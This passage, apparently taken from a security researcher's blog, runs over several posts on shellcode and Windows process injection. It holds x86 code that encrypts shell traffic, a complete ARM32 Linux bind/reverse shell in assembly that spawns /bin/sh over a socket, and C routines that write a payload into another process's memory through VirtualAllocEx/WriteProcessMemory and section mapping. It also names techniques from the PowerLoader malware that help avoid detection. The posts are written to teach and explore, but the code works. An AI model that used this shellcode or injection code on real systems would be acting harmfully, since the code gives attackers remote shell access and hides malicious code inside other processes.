      pop    eax
      int    0x80
      
      ; encrypt/decrypt buffer
      pushad
      xchg   eax, ecx
xor_loop:
      xor    byte[eax+ecx-1], XOR_KEY
      loop   xor_loop
      popad
      
      ; write(w, buf, len);
      xchg   eax, edx          ; edx = len
      mov    al, SYS_write
      pop    ebx               ; s or in[1]
      int    0x80
      jmp    poll_wait

Performing the same commands in a new session, it’s no longer readable. I’m using a hexdump here because it’s easier to visualize when a command is sent and when the results are received.

Of course, an 8-bit key is insufficient to defend against recovery of the plaintext, and the following screenshot shows Cyberchef brute forcing the key.

Speck and LightMAC

Initially, I used the following code for authenticated encryption of packets. It uses Encrypt-then-MAC (EtM), that is supposed to be more secure than other approaches; MAC-then-Encrypt (MtE) or Encrypt-and-MAC (E&M)

bits 32
    
%define SPECK_RNDS    27
%define N              8
%define K             16  
; *****************************************
; Light MAC parameters based on SPECK64-128
;
; N = 64-bits
; K = 128-bits
;
%define COUNTER_LENGTH N/2  ; should be <= N/2
%define BLOCK_LENGTH   N  ; equal to N
%define TAG_LENGTH     N  ; >= 64-bits && <= N
%define BC_KEY_LENGTH  K  ; K

%define ENCRYPT_BLK speck_encrypt
%define GET_MAC lightmac
%define LIGHTMAC_KEY_LENGTH BC_KEY_LENGTH*2 ; K*2
    
%define k0 edi    
%define k1 ebp    
%define k2 ecx    
%define k3 esi

%define x0 ebx    
%define x1 edx

; esi = IN data
; ebp = IN key

speck_encrypt:   
      pushad

      push    esi            ; save M
      
      lodsd                  ; x0 = x->w[0]
      xchg    eax, x0
      lodsd                  ; x1 = x->w[1]
      xchg    eax, x1

      mov     esi, ebp       ; esi = key
      lodsd
      xchg    eax, k0        ; k0 = key[0] 
      lodsd
      xchg    eax, k1        ; k1 = key[1]
      lodsd
      xchg    eax, k2        ; k2 = key[2]
      lodsd 
      xchg    eax, k3        ; k3 = key[3]    
      xor     eax, eax       ; i = 0
spk_el:
      ; x0 = (ROTR32(x0, 8) + x1) ^ k0;
      ror     x0, 8
      add     x0, x1
      xor     x0, k0
      ; x1 = ROTL32(x1, 3) ^ x0;
      rol     x1, 3
      xor     x1, x0
      ; k1 = (ROTR32(k1, 8) + k0) ^ i;
      ror     k1, 8
      add     k1, k0
      xor     k1, eax
      ; k0 = ROTL32(k0, 3) ^ k1;
      rol     k0, 3
      xor     k0, k1    
      xchg    k3, k2
      xchg    k3, k1
      ; i++
      inc     eax
      cmp     al, SPECK_RNDS    
      jnz     spk_el
      
      pop     edi    
      xchg    eax, x0        ; x->w[0] = x0
      stosd
      xchg    eax, x1        ; x->w[1] = x1
      stosd
      popad
      ret

; edx = IN len
; ebx = IN msg
; ebp = IN key
; edi = OUT tag      
lightmac:
      pushad
      mov      ecx, edx
      xor      edx, edx
      add      ebp, BLOCK_LENGTH + BC_KEY_LENGTH      
      pushad                 ; allocate N-bytes for M
      ; zero initialize T
      mov     [edi+0], edx   ; t->w[0] = 0;
      mov     [edi+4], edx   ; t->w[1] = 0;
      ; while we have msg data
lmx_l0:
      mov     esi, esp       ; esi = M
      jecxz   lmx_l2         ; exit loop if msglen == 0
lmx_l1:
      ; add byte to M
      mov     al, [ebx]      ; al = *data++
      inc     ebx
      mov     [esi+edx+COUNTER_LENGTH], al           
      inc     edx            ; idx++
      ; M filled?
      cmp     dl, BLOCK_LENGTH - COUNTER_LENGTH
      ; --msglen
      loopne  lmx_l1
      jne     lmx_l2
      ; add S counter in big endian format
      inc     dword[esp+_edx]; ctr++
      mov     eax, [esp+_edx]
      ; reset index
      cdq                    ; idx = 0
      bswap   eax            ; m.ctr = SWAP32(ctr)
      mov     [esi], eax
      ; encrypt M with E using K1
      call    ENCRYPT_BLK
      ; update T
      lodsd                  ; t->w[0] ^= m.w[0];
      xor     [edi+0], eax      
      lodsd                  ; t->w[1] ^= m.w[1];
      xor     [edi+4], eax         
      jmp     lmx_l0         ; keep going
lmx_l2:
      ; add the end bit
      mov     byte[esi+edx+COUNTER_LENGTH], 0x80
      xchg    esi, edi       ; swap T and M
lmx_l3:
      ; update T with any msg data remaining    
      mov     al, [edi+edx+COUNTER_LENGTH]
      xor     [esi+edx], al
      dec     edx
      jns     lmx_l3
      ; advance key to K2
      add     ebp, BC_KEY_LENGTH
      ; encrypt T with E using K2
      call    ENCRYPT_BLK
      popad                  ; release memory for M
      popad                  ; restore registers
      ret
 
; IN: ebp = global memory, edi = msg, ecx = enc flag, edx = msglen 
; OUT: -1 or length of data encrypted/decrypted
encrypt:
      push    -1
      pop     eax            ; set return value to -1
      pushad
      lea     ebp, [ebp+@ctx] ; ebp crypto ctx
      mov     ebx, edi       ; ebx = msg      
      pushad                 ; allocate 8-bytes for tag+strm
      mov     edi, esp       ; edi = tag
      ; if (enc) {
      ;   verify tag + decrypt
      jecxz   enc_l0
      ; msglen -= TAG_LENGTH;
      sub     edx, TAG_LENGTH
      jle     enc_l5         ; return -1 if msglen <= 0
      mov     [esp+_edx], edx
      ; GET_MAC(ctx, msg, msglen, mac);
      call    GET_MAC
      ; memcmp(mac, &msg[msglen], TAG_LENGTH)
      lea     esi, [ebx+edx] ; esi = &msg[msglen]  
      cmpsd
      jnz     enc_l5         ; not equal? return -1
      cmpsd 
      jnz     enc_l5         ; ditto
      ; MACs are equal
      ; zero the MAC
      xor     eax, eax
      mov     [esi-4], eax
      mov     [esi-8], eax
enc_l0:
      mov     edi, esp
      test    edx, edx       ; exit if (msglen == 0)
      jz      enc_lx
      ; memcpy (strm, ctx->e_ctr, BLOCK_LENGTH);
      mov     esi, [esp+_ebp]; esi = ctx->e_ctr
      push    edi
      movsd
      movsd
      mov     ebp, esi
      pop     esi      
      ; ENCRYPT_BLK(ctx->e_key, &strm);
      call    ENCRYPT_BLK
      mov     cl, BLOCK_LENGTH
      ; r=(len > BLOCK_LENGTH) ? BLOCK_LENGTH : len;
enc_l2:
      lodsb                  ; al = *strm++
      xor     [ebx], al      ; *msg ^= al
      inc     ebx            ; msg++
      dec     edx
      loopnz  enc_l2         ; while (!ZF && --ecx)
      mov     cl, BLOCK_LENGTH      
enc_l3:                      ; do {
      ; update counter
      mov     ebp, [esp+_ebp]
      inc     byte[ebp+ecx-1]    
      loopz   enc_l3         ; } while (ZF && --ecx)
      jmp     enc_l0
enc_lx:
      ; encrypting? add MAC of ciphertext
      dec     dword[esp+_ecx]
      mov     edx, [esp+_edx]
      jz      enc_l4
      mov     edi, ebx
      mov     ebx, [esp+_ebx]
      mov     ebp, [esp+_ebp]
      ; GET_MAC(ctx, buf, buflen, msg);
      call    GET_MAC
      ; msglen += TAG_LENGTH;
      add     edx, TAG_LENGTH
enc_l4:
      ; return msglen;
      mov     [esp+32+_eax], edx            
enc_l5:      
      popad
      popad
      ret

This works of course, but it requires a protocol. The receiver needs to know in advance how much data is being sent before it can authenticate the data. The encrypted length needs to be sent first, followed by the encrypted data. That’ll work, but hangon! this is a shellcode! Why so complicated? Let’s just use RC4! Let’s not!

Gimli

In an attempt to replicate the behaviour of RC4 using Gimli, I wrote the following bit of code. The permute function is essentially Gimli.

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
#define X(a,b)(t)=(s[a]),(s[a])=(s[b]),(s[b])=(t)
  
void permute(void*p){
  uint32_t i,r,t,x,y,z,*s=p;

  for(r=24;r>0;--r){
    F(4)
      x=R(s[i],24),
      y=R(s[4+i],9),
      z=s[8+i],   
      s[8+i]=x^(z+z)^((y&z)*4),
      s[4+i]=y^x^((x|z)*2),
      s[i]=z^y^((x&y)*8);
    t=r&3;    
    if(!t)
      X(0,1),X(2,3),
      *s^=0x9e377900|r;   
    if(t==2)X(0,2),X(1,3);
  }
}

typedef struct _crypt_ctx {
    uint32_t idx;
    int      fdr, fdw;
    uint8_t  s[48];
    uint8_t  buf[BUFSIZ];
} crypt_ctx;
  
uint8_t gf_mul(uint8_t x) {
    return (x << 1) ^ ((x >> 7) * 0x1b);
}

// initialize crypto context
void init_crypt(crypt_ctx *c, int r, int w, void *key) {
    int i;
    
    c->fdr = r; c->fdw = w;
    
    for(i=0;i<48;i++) { 
      c->s[i] = ((uint8_t*)key)[i % 16] ^ gf_mul(i);
    }
    permute(c->s);
    c->idx = 0;
}

// encrypt or decrypt buffer
void crypt(crypt_ctx *c) {
    int i, len;

    // read from socket or stdout
    len = read(c->fdr, c->buf, BUFSIZ);
    
    // encrypt/decrypt
    for(i=0;i<len;i++) {
      if(c->idx >= 32) {
        permute(c->s);
        c->idx = 0;
      }
      c->buf[i] ^= c->s[c->idx++];
    }
    // write to socket or stdin
    write(c->fdw, c->buf, len);
}

To use this in the Linux shell, we declare two seperate crypto contexts for input and output along with a 128-bit static key.

// using a static 128-bit key
    crypt_ctx          *c, c1, c2;
    
    // echo -n top_secret_key | openssl md5 -binary -out key.bin
    // xxd -i key.bin
    
    uint8_t key[] = {
      0x4f, 0xef, 0x5a, 0xcc, 0x15, 0x78, 0xf6, 0x01, 
      0xee, 0xa1, 0x4e, 0x24, 0xf1, 0xac, 0xf9, 0x49 };

Before entering the main polling loop, we need to initialize each context with a read and write file descriptor. This helps save a bit on code. This could be inlined when adding a descriptor to monitor.

//
        // c1 is for reading from socket and writing to stdin
        init_crypt(&c1, s, in[1], key);
        
        // c2 is for reading from stdout and writing to socket
        init_crypt(&c2, out[0], s, key);
        
        // now loop until user exits or some other error
        for (;;) {
          r = epoll_wait(efd, &evts, 1, -1);
                  
          // error? bail out           
          if (r<=0) break;
         
          // not input? bail out
          if (!(evts.events & EPOLLIN)) break;

          fd = evts.data.fd;
          
          c = (fd == s) ? &c1 : &c2; 
          
          crypt(c);     
        }

Summary

Recovery of the shellcode would lead to recovery of the plaintext since it uses a static key for encryption. To prevent this, one would need to use a key exchange protocol like Diffie-Hellman. 😀

Posted in arm, assembly, cryptography, linux, programming, security, shellcode | Tagged , , , | Leave a comment

Shellcode: Synchronous shell for Linux in ARM32 assembly

Introduction

Here’s the synchronous shell for Linux/ARM32 that I promised in a previous post. It was tested on a Raspberry Pi 3 with ncat. The two versions I posted before here and here function exactly the same as this. Unfortunately NASM/YASM assemblers don’t support ARM, although it would be nice if they did in the future! The free assemblers available to us are the GNU assembler (GAS) and a lesser known assembler called VASM. I didn’t use VASM for this, however, it might be more suitable for programming large projects in ARM assembly. I almost forgot FASMARM, but probably because it’s written in x86 assembly. 😀

As I mentioned before about writing assembly code, it’s wise to use data structures and symbolic names because it’s much easier referring to a word rather than a number when accessing a memory location or variable. This helps reduce the potential for bugs appearing in the final code and obviously makes it easier to update later if required.

This code doesn’t use THUMB mode (16-bit) and isn’t free of null bytes.

Symbolic names

In C, we can use the #define preprocessor directive and for NASM/YASM there’s the %define directive. GAS provides the .req directive for registers and the .set or .equ directives for anything else.

Consider the symbolic name “TRUE” that we assign with the number 1.

#define TRUE 1

%define TRUE 1

.equ TRUE, 1
.set TRUE, 1

I’ve included two names for reconfiguring the code. If BIND is commented out, the assembly will work as a reverse connecting shell. If EXIT is commented out, the assembly will behave like a function, returning to the caller once the code completes execution.

// comment out for a reverse connecting shell
.equ BIND, 1

// comment out for code to behave as a function
.equ EXIT, 1

The system calls and some of their parameters are also clearly defined to help the reader understand what the code does.

.equ BUFSIZ,             64
.equ NULL,                0
.equ SIGCHLD,            20
.equ SHUT_RDWR,           1

.equ STDIN_FILENO,        0
.equ STDOUT_FILENO,       1
.equ STDERR_FILENO,       2

.equ AF_INET,             2
.equ SOCK_STREAM,         1
.equ IPPROTO_IP,          0

.equ EPOLLIN,             1

.equ EPOLL_CTL_ADD,       1
.equ EPOLL_CTL_DEL,       2
.equ EPOLL_CTL_MOD,       3

// system calls
.equ SYS_exit,            1
.equ SYS_fork,            2
.equ SYS_read,            3
.equ SYS_write,           4
.equ SYS_close,           6
.equ SYS_execve,         11
.equ SYS_kill,           37
.equ SYS_pipe,           42
.equ SYS_dup2,           63
.equ SYS_epoll_ctl,     251
.equ SYS_epoll_wait,    252
.equ SYS_socket,        281
.equ SYS_bind,          282
.equ SYS_connect,       283
.equ SYS_listen,        284
.equ SYS_accept,        285
.equ SYS_shutdown,      293
.equ SYS_epoll_create1, 357

Symbolic names help clarify the purpose of numbers.. If you want to be a wizard (or go crazy) and memorize every number in your head, you can do that too. 🙂

Structures and unions

Both YASM and NASM support the concept of data structures, but the GNU Assembler isn’t that straight forward. There’s a .struct directive, but it doesn’t really support fields without some manual construction.

Since neither GAS nor YASM/NASM support the concept of UNIONs that many C programmers might be familiar with, the only alternatives are using the .set or .equ directives. Incidentally, JWASM/MASM do support UNIONs. (I wonder if it’s possible to use Microsoft’s ARMASM along with some COFF2ELF utility??)

The following unions/structures defined in C need converted into assembly format.

typedef union epoll_data {
  void     *ptr;
  int      fd;
  uint32_t u32;
  uint64_t u64;
} epoll_data_t;
  
struct epoll_event {
  uint32_t     events;
  epoll_data_t data;
};

typedef struct _ds_tbl {
  int          p_in[2];
  int          p_out[2];
  int          pid;
  int          s;
#ifdef BIND
  int          s2;
#endif
  int          efd;
  epoll_event evts;
  uint8_t      buf[BUFSIZ];
} ds_tbl;

As it turns out, the size of epoll_event is 16 bytes. 4 bytes for events, and 8 for epoll_data. The additional 4 bytes are to align the memory.

Unions are unsupported in most assemblers, so as a workaround I use %define in NASM/YASM or .set/.equ in GAS. The following uses a combination of .struct, .skip and .equ.

// structure for stack variables

              .struct 0
      p_in:   .skip 8
              .equ in0, p_in + 0
              .equ in1, p_in + 4
          
      p_out:  .skip 8
              .equ out0, p_out + 0
              .equ out1, p_out + 4
          
      pid:    .skip 4
      s:      .skip 4

      .ifdef BIND
        s2:   .skip 4
      .endif

      efd:    .skip 4
      evts:   .skip 16
              .equ events, evts + 0
              .equ data_fd,evts + 8
          
      buf:    .skip BUFSIZ
      ds_tbl_size:

Assembly code

Use GNU “as” and “ld” to create a binary. Use “objcopy” if you want to extract just the shellcode itself from the “.text” section.

Writing this code required some debugging, and I prefer to use plain old GDB in TUI mode with a split and register layout.

// shellcode for raspberry pi 3 running debian linux
      .arm
      .arch armv7-a
      .align 4

      // comment out for a reverse connecting shell
      .equ BIND, 1

      // comment out for code to behave as a function
      .equ EXIT, 1

      .equ BUFSIZ,             64
      .equ NULL,                0
      .equ SIGCHLD,            20
      .equ SHUT_RDWR,           1

      .equ STDIN_FILENO,        0
      .equ STDOUT_FILENO,       1
      .equ STDERR_FILENO,       2

      .equ AF_INET,             2
      .equ SOCK_STREAM,         1
      .equ IPPROTO_IP,          0

      .equ EPOLLIN,             1

      .equ EPOLL_CTL_ADD,       1
      .equ EPOLL_CTL_DEL,       2
      .equ EPOLL_CTL_MOD,       3

      // system calls
      .equ SYS_exit,            1
      .equ SYS_fork,            2
      .equ SYS_read,            3
      .equ SYS_write,           4
      .equ SYS_close,           6
      .equ SYS_execve,         11
      .equ SYS_kill,           37
      .equ SYS_pipe,           42
      .equ SYS_dup2,           63
      .equ SYS_epoll_ctl,     251
      .equ SYS_epoll_wait,    252
      .equ SYS_socket,        281
      .equ SYS_bind,          282
      .equ SYS_connect,       283
      .equ SYS_listen,        284
      .equ SYS_accept,        285
      .equ SYS_shutdown,      293
      .equ SYS_epoll_create1, 357

      // structure for stack variables

              .struct 0
      p_in:   .skip 8
              .equ in0, p_in + 0
              .equ in1, p_in + 4
          
      p_out:  .skip 8
              .equ out0, p_out + 0
              .equ out1, p_out + 4
          
      pid:    .skip 4
      s:      .skip 4

      .ifdef BIND
        s2:   .skip 4
      .endif

      efd:    .skip 4
      evts:   .skip 16
              .equ events, evts + 0
              .equ data_fd,evts + 8
          
      buf:    .skip BUFSIZ
      ds_tbl_size:

      .global _start
      .text
_start:
      // save all registers
      push   {r0-r12, lr}

      // allocate memory for variables
      sub     sp, #ds_tbl_size

      // create pipes for stdin
      mov     r7, #SYS_pipe
      add     r0, sp, #p_in
      svc     0

      // create pipes for stdout + stderr
      add     r0, sp, #p_out
      svc     0

      // fork a separate instance for shell
      mov     r7, #SYS_fork
      svc     0
      str     r0, [sp, #pid]   // save pid
      cmp     r0, #0           // already forked?
      bne     opn_con          

      // in this order..
      //
      // dup2 (out[1], STDERR_FILENO)      
      // dup2 (out[1], STDOUT_FILENO)
      // dup2 (in[0],  STDIN_FILENO )
      mov     r7, #SYS_dup2
      mov     r1, #(STDERR_FILENO + 1)       
c_dup:
      subs    r1, #1
      ldrne   r0, [sp, #out1]
      ldreq   r0, [sp, #in0]
      svc     0
      bne     c_dup

      // close pipe handles in this order..
      //
      // close(in[0]);
      // close(in[1]);
      // close(out[0]);
      // close(out[1]);
      mov     r1, #3
      mov     r7, #SYS_close
cls_pipe:
      ldr     r0, [sp, r1, lsl #2]
      svc     0
      subs    r1, #1
      bpl     cls_pipe
      
      // execve("/bin/sh", NULL, NULL);
      ldr     r0, =#0x6e69622f // /bin
      ldr     r1, =#0x68732f2f // //sh
      eor     r2, r2
      push    {r0, r1, r2}
      eor     r1, r1    
      mov     r0, sp
      mov     r7, #SYS_execve
      svc     0
    
opn_con:
      // close(in[0]);
      mov     r7, #SYS_close
      ldr     r0, [sp, #in0]    
      svc     0

      // close(out[1]);
      ldr     r0, [sp, #out1]    
      svc     0
     
      // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      movw    r7, #SYS_socket
      mov     r2, #IPPROTO_IP
      mov     r1, #SOCK_STREAM
      mov     r0, #AF_INET
      svc     0
      
      str     r0, [sp, #s]
      
      ldr     r3, =#0xD2040002 // htons(1234), AF_INET
            
      .ifdef BIND
        eor   r4, r4           // sa.sin_addr=INADDR_ANY
      .else
        ldr   r4, =#0x0100007f // sa.sin_addr=127.0.0.1
      .endif
      
      mov     r2, #16  // sizeof(sa)
      push    {r3, r4} // sa parameters
      mov     r1, sp   // r1 = &sa
.ifdef BIND  
      // bind (s, &sa, sizeof(sa));   
      movw    r7, #SYS_bind
      svc     0
      pop     {r3, r4}
      tst     r0, r0
      bne     cls_sck        // if(r0 != 0) goto cls_sck

      // listen (s, 1);
      mov     r7, #SYS_listen
      mov     r1, #1
      ldr     r0, [sp, #s]
      svc     0

      // accept (s, 0, 0);
      movw    r7, #SYS_accept
      eor     r2, r2
      eor     r1, r1
      ldr     r0, [sp, #s]
      svc     0
      
      ldr     r1, [sp, #s]      // load binding socket
      str     r0, [sp, #s]      // save peer socket as s
      str     r1, [sp, #s2]     // save binding socket as s2
.else
      // connect (s, &sa, sizeof(sa)); 
      movw    r7, #SYS_connect
      svc     0  
      pop     {r3, r4}       // release &sa
      tst     r0, r0
      bne     cls_sck        // if(r0 != 0) goto cls_sck
.endif 
      // efd = epoll_create1(0);
      movw    r7, #SYS_epoll_create1
      eor     r0, r0
      svc     0
      str     r0, [sp, #efd]
 
      ldr     r2, [sp, #s]
      ldr     r4, [sp, #out0]
poll_init:
      // epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
      mov     r7, #SYS_epoll_ctl
      mov     r3, #EPOLLIN
      str     r3, [sp, #events]   // evts.events  = EPOLLIN
      str     r2, [sp, #data_fd]  
      add     r3, sp, #evts       // r3 = &evts
      mov     r1, #EPOLL_CTL_ADD  // r1 = EPOLL_CTL_ADD
      ldr     r0, [sp, #efd]      // r0 = efd
      svc     0
      cmp     r2, r4              // if (r2 != out0) r2 = out0
      movne   r2, r4
      bne     poll_init           // loop twice
      // now loop until user exits or there's some other error      
poll_wait:
      // epoll_wait(efd, &evts, 1, -1);
      mov     r7, #SYS_epoll_wait
      mvn     r3, #0
      mov     r2, #1
      add     r1, sp, #evts
      ldr     r0, [sp, #efd]
      svc     0
      
      // if (r <= 0) break;
      tst     r0, r0
      ble     cls_efd
      
      // if (!(evts.events & EPOLLIN)) break;
      ldr     r0, [sp, #events]
      tst     r0, #EPOLLIN
      beq     cls_efd

      // r0 = evts.data.fd
      ldr     r0, [sp, #data_fd]
      // r3 = s
      ldr     r3, [sp, #s]
      // r = (fd == s) ? s     : out[0];
      // w = (fd == s) ? in[1] : s;
      cmp     r0, r3
      ldrne   r0, [sp, #out0]
      ldreq   r3, [sp, #in1]
      
      // read(r, buf, BUFSIZ);
      mov     r7, #SYS_read
      mov     r2, #BUFSIZ
      add     r1, sp, #buf
      svc     0
      
      // encrypt/decrypt buffer
      
      // write(w, buf, len);
      mov     r7, #SYS_write
      mov     r2, r0
      mov     r0, r3
      svc     0
      b       poll_wait
cls_efd:   
      // epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);
      mov     r7, #SYS_epoll_ctl
      mov     r3, #NULL
      ldr     r2, [sp, #s]
      mov     r1, #EPOLL_CTL_DEL
      ldr     r0, [sp, #efd]
      svc     0
    
      // epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);
      ldr     r2, [sp, #out0]
      ldr     r0, [sp, #efd]
      svc     0
      
      // close(efd);
      mov     r7, #SYS_close
      ldr     r0, [sp, #efd]
      svc     0
cls_sck:
      // shutdown(s, SHUT_RDWR);
      movw    r7, #SYS_shutdown
      mov     r1, #SHUT_RDWR
      ldr     r0, [sp, #s]
      svc     0
      
      // close(s);
      mov     r7, #SYS_close
      ldr     r0, [sp, #s]
      svc     0
    
.ifdef BIND
      // close(s2);
      mov     r7, #SYS_close
      ldr     r0, [sp, #s2]
      svc     0
.endif            
      // kill(pid, SIGCHLD);
      mov     r7, #SYS_kill
      mov     r1, #SIGCHLD
      ldr     r0, [sp, #pid]
      svc     0

      // close(in[1]);
      mov     r7, #SYS_close
      ldr     r0, [sp, #in1]
      svc     0  

      // close(out[0]);
      mov     r7, #SYS_close
      ldr     r0, [sp, #out0]
      svc     0
      
.ifdef EXIT
      // exit(0);
      mov     r7, #SYS_exit
      svc     0 
.else
      // deallocate stack
      add     sp, #ds_tbl_size
      
      // restore registers and return
      pop     {r0-r12, pc}
.endif

Summary

If you really must use assembly code to write something, it’s always good practice to clearly define everything with words instead of using numbers that can cause confusion for someone else reading the code. This shell can be easily modified to include some basic encryption of the traffic sent between two systems. To start off, you could implement a simple exclusive-OR (XOR) of the outgoing and incoming stream.

Source code to the shell can be found here.

Posted in arm, assembly, linux, programming, raspberry, shellcode | Tagged , , , , | 1 Comment

Windows Process Injection: Sharing the payload

Introduction

The last post discussed some of the problems when writing a payload for process injection. The purpose of this post is to discuss deploying the payload into the memory space of a target process for execution. One can use conventional Win32 API for this task that some of you will already be familiar with, but there’s also the potential to be creative using unconventional approaches. For example, we can use API to perform read and write operations they weren’t originally intended for, that might help evade detection. There are various ways to deploy and execute a payload, but not all are simple to use. Let’s first focus on the conventional API that despite being relatively easy to detect are still popular among threat actors.

Below is a screenshot of VMMap from sysinternals showing the types of memory allocated for the system I’ll be working on (Windows 10). Some of this memory has the potential to be used for storage of a payload.

Allocating virtual memory

Each process has its own virtual address space. Shared memory exists between processes, but in general, process A should not be able to view the virtual memory of process B without assistance from the Kernel. The Kernel can of course see the virtual memory of all processes because it has to perform virtual to physical memory translation. Process A can allocate new virtual memory in the address space of process B using Virtual Memory API that is then handled internally by the Kernel. Some of you may be familiar with the following steps to deploy a payload in virtual memory of another process.

  1. Open a target process using OpenProcess or NtOpenProcess.
  2. Allocate eXecute-Read-Write (XRW) memory in a target process using VirtualAllocEx or NtAllocateVirtualMemory.
  3. Copy a payload to the new memory using WriteProcessMemory or NtWriteVirtualMemory.
  4. Execute payload.
  5. De-allocate XRW memory in target process using VirtualFreeEx or NtFreeVirtualMemory.
  6. Close target process handle with CloseHandle or NtClose.

Using the Win32 API. This only shows the allocation of XRW memory and writing the payload to new memory.

PVOID CopyPayload1(HANDLE hp, LPVOID payload, ULONG payloadSize){
    LPVOID ptr=NULL;
    SIZE_T tmp;
    
    // 1. allocate memory
    ptr = VirtualAllocEx(hp, NULL, 
      payloadSize, MEM_COMMIT|MEM_RESERVE,
      PAGE_EXECUTE_READWRITE);
      
    // 2. write payload
    WriteProcessMemory(hp, ptr, 
      payload, payloadSize, &tmp);
    
    return ptr;
}

Alternatively using the Nt/Zw API.

LPVOID CopyPayload2(HANDLE hp, LPVOID payload, ULONG payloadSize){
    LPVOID   ptr=NULL;
    ULONG    len=payloadSize;
    NTSTATUS nt;
    ULONG    tmp;
    
    // 1. allocate memory
    NtAllocateVirtualMemory(hp, &ptr, 0, 
      &len, MEM_COMMIT|MEM_RESERVE,
      PAGE_EXECUTE|PAGE_READWRITE);
      
    // 2. write payload
    NtWriteVirtualMemory(hp, ptr, 
      payload, payloadSize, &tmp);
    
    return ptr;
}

Although not shown here, an additional operation to remove Write permissions of the virtual memory might be used.

Create a section object

Another way is using section objects. What does Microsoft say about them?

A section object represents a section of memory that can be shared. A process can use a section object to share parts of its memory address space (memory sections) with other processes. Section objects also provide the mechanism by which a process can map a file into its memory address space.

Although the use of these API in a regular application is an indication of something malicious, threat actors will continue to use them for process injection.

  1. Create a new section object using NtCreateSection and assign to S.
  2. Map a view of S for attacking process using NtMapViewOfSection and assign to B1.
  3. Map a view of S for target process using NtMapViewOfSection and assign to B2.
  4. Copy a payload to B1.
  5. Unmap B1.
  6. Close S
  7. Return pointer to B2.
LPVOID CopyPayload3(HANDLE hp, LPVOID payload, ULONG payloadSize){
    HANDLE        s;
    LPVOID        ba1=NULL, ba2=NULL;
    ULONG         vs=0;
    LARGE_INTEGER li;

    li.HighPart = 0;
    li.LowPart  = payloadSize;
    
    // 1. create a new section
    NtCreateSection(&s, SECTION_ALL_ACCESS, 
      NULL, &li, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);

    // 2. map view of section for current process
    NtMapViewOfSection(s, GetCurrentProcess(),
      &ba1, 0, 0, 0, &vs, ViewShare,
      0, PAGE_EXECUTE_READWRITE);
    
    // 3. map view of section for target process  
    NtMapViewOfSection(s, hp, &ba2, 0, 0, 0, 
      &vs, ViewShare, 0, PAGE_EXECUTE_READWRITE); 
    
    // 4. copy payload to section of memory
    memcpy(ba1, payload, payloadSize);

    // 5. unmap memory in the current process
    ZwUnmapViewOfSection(GetCurrentProcess(), ba1);
    
    // 6. close section
    ZwClose(s);
    
    // 7. return pointer to payload in target process space
    return (PBYTE)ba2;
}

Using an existing section object and ROP chain

The Powerloader malware used existing shared objects created by explorer.exe to store a payload, but due to permissions of the object (Read-Write) could not directly execute the code without the use of a Return Oriented Programming (ROP) chain. It’s possible to copy a payload to the memory, but not to execute it without some additional trickery.

The following section names were used by PowerLoader for code injection.

"\BaseNamedObjects\ShimSharedMemory"
"\BaseNamedObjects\windows_shell_global_counters"
"\BaseNamedObjects\MSCTF.Shared.SFM.MIH"
"\BaseNamedObjects\MSCTF.Shared.SFM.AMF"
"\BaseNamedObjects\UrlZonesSM_Administrator"
"\BaseNamedObjects\UrlZonesSM_SYSTEM"
  1. Open existing section of memory in target process using NtOpenSection
  2. Map view of section using NtMapViewOfSection
  3. Copy payload to memory
  4. Use a ROP chain to execute

UI Shared Memory

enSilo demonstrated with PowerLoaderEx using UI shared memory for process execution. Injection on Steroids: Codeless code injection and 0-day techniques provides more details of how it works. It uses the desktop heap for injecting the payload into explorer.exe.

Reading a Desktop Heap Overview over at MSDN, we can see there’s already shared memory between processes for the User Interface.

Every desktop object has a single desktop heap associated with it. The desktop heap stores certain user interface objects, such as windows, menus, and hooks. When an application requires a user interface object, functions within user32.dll are called to allocate those objects. If an application does not depend on user32.dll, it does not consume desktop heap.

Using a code cave

Host Intrusion Prevention Systems (HIPS) will regard the use of VirtualAllocEx/WriteProcessMemory as suspicious activity, and this is likely why the authors of PowerLoader used existing section objects. PowerLoader likely inspired the authors behind AtomBombing to use a code cave in a Dynamic-link Library (DLL) for storing a payload and using a ROP chain for execution.

AtomBombing uses a combination of GlobalAddAtom, GlobalGetAtomName and NtQueueApcThread to deploy a payload into a target process. The execution is accomplished using a ROP chain and SetThreadContext. What other ways could one deploy a payload without using the standard approach?

Interprocess Communication (IPC) can be used to share data with another process. Some of the ways this can be achieved include:

  • Clipboard (WM_PASTE)
  • Data Copy (WM_COPYDATA)
  • Named pipes
  • Component Object Model (COM)
  • Remote Procedure Call (RPC)
  • Dynamic Data Exchange (DDE)

For the purpose of this post, I decided to examine WM_COPYDATA, but in hindsight, I think COM might be a better line of enquiry.

Data can be legitimately shared between GUI processes via the WM_COPYDATA message, but can it be used for process injection?. SendMessage and PostMessage are two such APIs that can be used to write data into a remote process space without explicitly opening the target process and copying data there using Virtual Memory API.

Kernel Attacks through User-Mode Callbacks presented at Blackhat 2011 by Tarjei Mandt, lead me to examine the potential for using the KernelCallbackTable located in the Process Environment Block (PEB) for process injection. This field is initialized to an array of functions when user32.dll is loaded into a GUI process and this is where I initially started looking after learning how window messages are dispatched by the kernel.

With WinDbg attached to notepad, obtain the address of the PEB.

0:001> !peb
!peb
PEB at 0000009832e49000

Dumping this in the windows debugger shows the following details. What we’re interested in here is the KernelCallbackTable, so I’ve stripped out most of the fields.

0:001> dt !_PEB 0000009832e49000
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
	
	// details stripped out
	
   +0x050 ReservedBits0    : 0y0000000000000000000000000 (0)
   +0x054 Padding1         : [4]  ""
   +0x058 KernelCallbackTable : 0x00007ffd6afc3070 Void
   +0x058 UserSharedInfoPtr : 0x00007ffd6afc3070 Void

If we dump the address 0x00007ffd6afc3070 using the dump symbol command, we see a reference to USER32!apfnDispatch.

0:001> dps $peb+58
0000009832e49058  00007ffd6afc3070 USER32!apfnDispatch
0000009832e49060  0000000000000000
0000009832e49068  0000029258490000
0000009832e49070  0000000000000000
0000009832e49078  00007ffd6c0fc2e0 ntdll!TlsBitMap
0000009832e49080  000003ffffffffff
0000009832e49088  00007df45c6a0000
0000009832e49090  0000000000000000
0000009832e49098  00007df45c6a0730
0000009832e490a0  00007df55e7d0000
0000009832e490a8  00007df55e7e0228
